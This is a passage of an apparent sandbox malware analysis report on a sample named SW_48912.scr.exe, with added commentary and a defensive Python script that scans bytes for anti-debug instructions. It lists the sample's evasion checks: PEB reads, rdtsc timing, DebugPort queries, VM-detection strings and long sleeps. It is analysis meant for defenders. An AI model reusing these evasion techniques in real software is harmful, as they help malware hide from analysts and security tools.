                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: A710000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0142096E rdtsc
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 4021
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 883
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sdchange.exe - API coverage: 2.6 %
                Source: C:\Users\user\Desktop\SW_48912.scr.exe TID: 7152 - Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920 - Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896 - Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\sdchange.exe TID: 2032 - Thread sleep count: 42 > 30
                Source: C:\Windows\SysWOW64\sdchange.exe TID: 2032 - Thread sleep time: -84000s >= -30000s
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe TID: 3488 - Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe TID: 3488 - Thread sleep time: -34500s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Last function: Thread delayed
                Source: C:\Windows\SysWOW64\sdchange.exe - Last function: Thread delayed (2 identical events)
                Source: C:\Windows\SysWOW64\sdchange.exe - Code function: 10_2_0271C3C0 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                Source: SW_48912.scr.exe, 00000000.00000002.1939670735.0000000008486000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: SW_48912.scr.exe, 00000000.00000002.1939670735.0000000008486000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2331578058.000001993BE5C000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3539278813.000000000119F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Process queried: DebugPort
                Source: C:\Windows\SysWOW64\sdchange.exe - Process queried: DebugPort
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0142096E rdtsc
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_004176B3 LdrLoadDll
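                The rows above record the usual user-mode anti-analysis checks: the PEB fetched through fs:[30h] (where BeingDebugged and NtGlobalFlag live), NtQueryInformationProcess with the DebugPort class, an rdtsc timing probe, and very long NtDelayExecution waits. Two caveats when reading them: -922337203685477 is INT64_MAX / 10000, the largest relative timeout the kernel accepts, so those rows are threads parked indefinitely rather than timed evasion delays; and "memory reserve | memory write watch" is MEM_WRITE_WATCH, which the .NET garbage collector uses for its own heap, so on a .NET sample like this one it is expected runtime behaviour. The Yara AntiVM hit, the VMware SCSI device string and the rdtsc/DebugPort checks are the rows that carry weight. The Python helper below is an added example written for this page, not Joe Sandbox code and not part of the sample: it scans a byte blob for the instruction encodings behind the "mov eax, dword ptr fs:[00000030h]" and "rdtsc" rows (and, going beyond the 32-bit sample here, the x64 gs:[60h] form), and classifies a reported sleep value using the report's own -30000 threshold. The sample bytes are constructed for the demonstration.

```python
"""Added example: static triage for the evasion rows above (not sandbox code)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# 32-bit encodings of a PEB fetch through the TEB (fs:[30h] -> PEB):
#   64 A1 30 00 00 00          mov eax, fs:[30h]   (short EAX-only form)
#   64 8B /r 30 00 00 00       mov r32, fs:[30h]   (ModRM mod=00, r/m=101 => disp32)
PEB_READ32 = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")
# x64 equivalent (assumption: the sample on this page is 32-bit; this is the general case):
#   65 48 8B /r 25 60 00 00 00 mov r64, gs:[60h]   (SIB with no base/index)
PEB_READ64 = re.compile(rb"\x65\x48\x8B[\x04\x0C\x14\x1C\x24\x2C\x34\x3C]\x25\x60\x00\x00\x00")
RDTSC = re.compile(rb"\x0F\x31")

REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")


@dataclass(frozen=True)
class Hit:
    offset: int
    kind: str     # "peb_read" or "rdtsc"
    detail: str   # decoded instruction for PEB reads, "" for rdtsc


def scan(blob: bytes) -> list[Hit]:
    """Return every PEB-read and rdtsc encoding found in blob, ordered by offset.

    This is raw byte matching, not disassembly: a hit inside data or in the
    middle of a longer instruction is possible, so confirm hits in a disassembler.
    """
    hits: list[Hit] = []
    for m in PEB_READ32.finditer(blob):
        enc = m.group(0)
        reg = "eax" if enc[1] == 0xA1 else REG32[(enc[2] >> 3) & 7]
        hits.append(Hit(m.start(), "peb_read", f"mov {reg}, fs:[30h]"))
    for m in PEB_READ64.finditer(blob):
        reg = "r" + REG32[(m.group(0)[3] >> 3) & 7][1:]
        hits.append(Hit(m.start(), "peb_read", f"mov {reg}, gs:[60h]"))
    for m in RDTSC.finditer(blob):
        hits.append(Hit(m.start(), "rdtsc", ""))
    return sorted(hits, key=lambda h: h.offset)


INT64_MAX = (1 << 63) - 1
# The report's -922337203685477 equals INT64_MAX // 10000: the largest relative
# timeout NtDelayExecution accepts, i.e. a thread parked indefinitely.
INFINITE_DELAY = INT64_MAX // 10000
LONG_SLEEP_THRESHOLD = 30000  # the ">= -30000" threshold used in the rows above


def classify_delay(reported: int) -> str:
    """Classify a sleep value as the report prints it (negative = relative wait)."""
    magnitude = abs(reported)
    if magnitude >= INFINITE_DELAY:
        return "infinite"
    if magnitude >= LONG_SLEEP_THRESHOLD:
        return "long"
    return "short"


# Constructed sample, not bytes from the analysed file: a tiny function that
# reads PEB.BeingDebugged and then takes a timestamp.
SAMPLE = bytes.fromhex(
    "55 8B EC"               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, fs:[30h]           -> PEB
    "0F B6 40 02"            # movzx eax, byte ptr [eax+2] -> PEB.BeingDebugged
    "64 8B 0D 30 00 00 00"   # mov ecx, fs:[30h]
    "0F 31"                  # rdtsc
    "5D C3"                  # pop ebp; ret
)

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(f"{hit.offset:#06x} {hit.kind:9} {hit.detail}")
    for value in (-922337203685477, -84000, -2000):
        print(value, classify_delay(value))
```

                To apply it to a real artefact, pass the bytes of a process dump or an unpacked section to scan(); because it matches raw bytes, treat each hit as a lead to confirm at that offset in a disassembler rather than as proof of an anti-debug check.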
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01474144 mov eax/ecx, dword ptr fs:[00000030h] (5 reads: 4 eax, 1 ecx)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01478158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014B4164 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0148E10E mov eax/ecx, dword ptr fs:[00000030h] (10 reads: 6 eax, 4 ecx)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0148A118 mov eax/ecx, dword ptr fs:[00000030h] (4 reads: 3 eax, 1 ecx)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014A0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01410124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013E6154 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013DC156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014A61C3 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0145E1D0 mov eax/ecx, dword ptr fs:[00000030h] (5 reads: 4 eax, 1 ecx)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013DA197 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014B61E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014101F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0149C188 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01420185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01484180 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0146019F mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01466050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013DA020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013DC020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013FE016 mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_0140C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01464000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01482000 mov eax, dword ptr fs:[00000030h] (8 reads)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013E2050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_01476030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014620DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013D80A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014660E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_014220F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013E208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013DC0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Code function: 5_2_013E80E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]5_2_013DA0E3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014780A8 mov eax, dword ptr fs:[00000030h]5_2_014780A8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A60B8 mov eax, dword ptr fs:[00000030h]5_2_014A60B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A60B8 mov ecx, dword ptr fs:[00000030h]5_2_014A60B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B634F mov eax, dword ptr fs:[00000030h]5_2_014B634F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA352 mov eax, dword ptr fs:[00000030h]5_2_014AA352
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01488350 mov ecx, dword ptr fs:[00000030h]5_2_01488350
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov ecx, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC310 mov ecx, dword ptr fs:[00000030h]5_2_013DC310
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148437C mov eax, dword ptr fs:[00000030h]5_2_0148437C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01400310 mov ecx, dword ptr fs:[00000030h]5_2_01400310
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov ecx, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149C3CD mov eax, dword ptr fs:[00000030h]5_2_0149C3CD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014663C0 mov eax, dword ptr fs:[00000030h]5_2_014663C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov ecx, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014843D4 mov eax, dword ptr fs:[00000030h]5_2_014843D4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014843D4 mov eax, dword ptr fs:[00000030h]5_2_014843D4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014163FF mov eax, dword ptr fs:[00000030h]5_2_014163FF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140438F mov eax, dword ptr fs:[00000030h]5_2_0140438F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140438F mov eax, dword ptr fs:[00000030h]5_2_0140438F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA3C0 mov eax, dword ptr fs:[00000030h]5_2_013EA3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E83C0 mov eax, dword ptr fs:[00000030h]5_2_013E83C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01468243 mov eax, dword ptr fs:[00000030h]5_2_01468243
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01468243 mov ecx, dword ptr fs:[00000030h]5_2_01468243
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D823B mov eax, dword ptr fs:[00000030h]5_2_013D823B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B625D mov eax, dword ptr fs:[00000030h]5_2_014B625D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A250 mov eax, dword ptr fs:[00000030h]5_2_0149A250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A250 mov eax, dword ptr fs:[00000030h]5_2_0149A250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 mov eax, dword ptr fs:[00000030h]5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D826B mov eax, dword ptr fs:[00000030h]5_2_013D826B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4260 mov eax, dword ptr fs:[00000030h]5_2_013E4260
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6259 mov eax, dword ptr fs:[00000030h]5_2_013E6259
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA250 mov eax, dword ptr fs:[00000030h]5_2_013DA250
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B62D6 mov eax, dword ptr fs:[00000030h]5_2_014B62D6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02A0 mov eax, dword ptr fs:[00000030h]5_2_013F02A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02A0 mov eax, dword ptr fs:[00000030h]5_2_013F02A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01460283 mov eax, dword ptr fs:[00000030h]5_2_01460283
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E284 mov eax, dword ptr fs:[00000030h]5_2_0141E284
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E284 mov eax, dword ptr fs:[00000030h]5_2_0141E284
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F02E1 mov eax, dword ptr fs:[00000030h]5_2_013F02E1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov ecx, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014762A0 mov eax, dword ptr fs:[00000030h]5_2_014762A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
